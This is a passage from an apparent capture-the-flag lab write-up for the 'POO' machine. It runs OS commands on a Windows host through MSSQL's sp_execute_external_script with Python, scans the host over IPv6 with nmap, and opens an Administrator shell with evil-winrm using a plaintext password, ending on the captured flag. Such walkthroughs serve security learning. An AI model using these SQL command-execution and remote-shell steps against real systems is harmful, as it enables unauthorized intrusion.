IPV6 ports
SQL (ctflover dbo@POO_PUBLIC)> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("netstat -ano"))'
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4 \
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:41433 0.0.0.0:0 LISTENING 4824
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 496
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1180
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1608
--SNIP--
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 928
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1433 [::]:0 LISTENING 4808
TCP [::]:5357 [::]:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:41433 [::]:0 LISTENING 4824
port 5985 is on on both IPV4 and V6, my nmap scan which only scanned for ipv4 was not able to find port 5986, lets check ipv6
➜ poo nmap -6 -p- dead:beef::1001 --min-rate 10000 -v -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-18 21:46 IST
Initiating Parallel DNS resolution of 1 host. at 21:46
Completed Parallel DNS resolution of 1 host. at 21:46, 0.00s elapsed
Initiating Connect Scan at 21:46
Scanning dead:beef::1001 [65535 ports]
Discovered open port 80/tcp on dead:beef::1001
Discovered open port 5985/tcp on dead:beef::1001
5985 is on.
Now i can evil-winrm in the target but first i need targets hostname in my /etc/hosts file.
SQL (ctflover dbo@POO_PUBLIC)> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("hostname"))'
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
COMPATIBILITY
cat /etc/hosts
10.13.38.11 intranet.poo compatibility.intranet.poo
dead:beef::1001 compatibility
Got shell ->
➜ poo evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i compatibility
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff87c4fe0e2ef096f9a96a01c646--snip--}